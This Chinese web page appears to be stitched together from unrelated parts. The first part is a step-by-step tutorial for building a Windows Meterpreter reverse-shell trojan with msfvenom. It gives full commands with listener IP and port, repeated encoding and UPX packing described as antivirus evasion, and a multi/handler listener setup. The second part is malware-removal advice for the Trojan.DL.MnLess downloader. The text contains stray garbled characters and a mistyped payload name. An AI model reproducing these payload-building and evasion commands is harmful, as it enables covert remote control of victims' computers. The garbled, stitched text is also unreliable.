如何用msfvenom生成木马程序

一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制.

二,工具:MSF

三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线

四,过程:

1,查看帮助

命令: root# msfvenom -h

结果:

2,生成meterpreter payload 并利用shikata_ga_nai编码,查看所需选项,利用 -o参数

命令: root# msfvenom -p windows/meterpreter/reverse_tcp -o

结果:

3,现在设置LHOST,即监听主机IP和LPORT监听端口,我是本地局域网测试,所以IP是192.168.1.113,端口设置成443.所以最后连接会通向192.168.1.113的443端口

命令: root# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.1.113 LPORT=443 -f exe >abc.exe

注:如果只是用msfpayload生成橡谨,简单示例:

命令: root # msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.113 X >Desktop/abc.exe

多次生成可进行免杀:msfpayload windows/shell_reverse_tcp lhost=192.168.128.129 lport=888 r| msfencode -e x86/shikata_ga_nai -c 7 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -e x86/shikata_ga_nai -c 6 -t raw | msfencode -e x86/alpha_upper -c 3 -t exe -o /root/Desktop/acn.exe

upx加壳：upx -5 /root/Desktop/acn.exe

结果:

说明梁则基: -p payload

-e 编码方式

-i 编码次数

-b 在生成的程序中避免出现的值

LHOST,LPORT 监听上线的主机IP和端口

-f exe 生成EXE格式

4,把生成的abc.exe放到win7下.执行.

5,在命令行盯知下,打开msfconsole.

命令: root # msfconsole

6,本机监听,因为之前用的是reverse_tcp,所以设置如下

命令: msf >use exploit/multi/handler

Msf exploit(handler) >set payload windows/meterpreter/reverset_tcp

结果:

7,现在快完成了,设置LHOST,LPORT,并执行exploit,会发现有连接进来.

8,.验证

老大

那玩意庆和是病毒。

病毒名称Trojan Horse 的病毒

trojan.dl.mnless.ap是一般杀毒软件无法删除木马下载器病毒，不过现在已经解决衡穗了，不用重装系统，经验与朋友共分享。

Trojan.DL.MnLess.aa（或al、ap等）是一个木马下载器，从黑客指定站点下载其它木马，并在被感染的计算机上自动运行。

开机后随系统启动而运行，所以开机后点击右键删除被病毒感染的文件是不可能的杀毒软件也不能将病毒清除。

电脑中了Trojan.DL.Mnless.ap和Trojan.DL.Mnless.al病毒，这两种病毒一般同时出现，

在WINNT下system32文件夹及其子文件夹下创建（C:\WINDOWS\System32\DRIVERS\xokni.sys）病毒文件，

这些文件没有固定的名称。Trojan.DL.Mnless.ap病毒文件后缀为.sys；Trojan.DL.Mnless.al病毒文件后缀为.dll。

杀毒软件无法删除此病毒，总是提示重起后删除。

想不重装系统，可以下载Unlocker手动删除顽固的病毒文件。

Unlocker 是一个免费的右键扩充工具，使用者在安装后，它便能整合于鼠标右键的 *** 作当中，当使用者发现有某个文件或目录无法删除时，

只要按下 1000 鼠标右键中的“Unlocker”，那么程序马上就会显示出是哪一些程序占用了该目录或文件，

接着只要按下d出的窗口中的“Unlock”就能够为你的文件解套。

Unlocker 不同于其它解锁软件的部分在于它并非强制关闭那些占用文件的程序，而是以解除文件与程序关连性的方式来解锁，

因此不会像其它解锁程序一样因为强制关闭程序而造成使用者可能的数据遗失。

（专集R（九）劲爆DJ 中有Unlocker下载，安装简单，占用很少空间！）

方法2：

其实 Trojan Horse 是某些防毒软件对木马的一种统称，它并不代表着固定的一个，而是一类，所以即使

遇到同样名子的木马可能它们也并不相同。 费尔托斯特安全是一款可以清除木马和病毒的软件，并且有

很强的清除能力，如果您有它的正式版可以在升级到最新病毒库后尝试用它扫描清除一下，但这里需要特

别提醒一点： 由于这类木马新变种层出不穷，所以不能保证费尔托斯特安全能够识别出目前所有的或者

您遇到的。 那么除此之外难道就没有其他办法了吗？有的，下面就介绍一个借助免费工具“费尔木马强

力清除助手”(此工具已经集成到费尔托斯特安全新版本中了)来清除这种顽固性 Trojan Horse 木马的方

法：

使用这个方法前必须要先知道这个木马的文件名是什么。防毒软件在发现木马后一般都会报告它的完整文

件名，您需要先准确的记录下这个文件名。比誉拦盯如：如果防毒软件提示 C:\Windows\hello.dll 是 Trojan

Horse，则记下 C:\Windows\hello.dll 这个名子。这里需要注意文件名一定要记准确，因为有许多木马

会把自己的文件名故意伪装成和正常的文件名很接近，比如 svch0st.exe(木马)->svchost.exe(正常)、

Expl0rer.exe(木马)->Explorer.exe(正常)、intrenat.exe / internet.exe(木马)->internat.exe(正常

)等等。特别是数字0几乎和大写字母O一样，很容易让人看错，所以一定要注意区分它们，否则万一记错

将有可能把正常的文件清除掉，那就麻烦了；

暂停防毒软件的实时监控，这一点很重要，否则在清除时可能会被阻止而无法成功。比如如果当初是你的

诺顿发现了这个木马，那么请先暂停诺顿的实时监控或实时扫描；

下载费尔木马强力清除助手 http://dl.filseclab.com/down/powerrmv.zip；

释放 PowerRmv.zip 到一个目录，然后执行其中的 PowerRmv.exe 启动“费尔木马强力清除助手”。在“

文件名”中输入要清除的木马文件名。比如如果您在第1步中记下的文件名是 C:\Windows\hello.dll，那

么这时就输入它；

按“清除”。这时程序会询问你是否要举报此病毒到费尔安全实验室，建议点“是”表示同意。接着程序

会继续提示是否确定要清除它，仍然选“是”；

之后，如果此木马被成功清除程序会提示成功；或者也可能提示此木马无法被立即删除需要重启电脑。无

论是哪种情况请点击“确定”，这时如果您在前面同意了举报此木马那么程序会自动创建并打开一个“病

毒举报”的电子邮件，其中会包含这个木马的样本文件。如果您并没有看到这封邮件也没有关系，可以忽

略。

最后，如果程序前面提示了重启电脑后才能清除那么请一定重启您的电脑，在电脑重启后这个木马应该就

被清除掉了。

---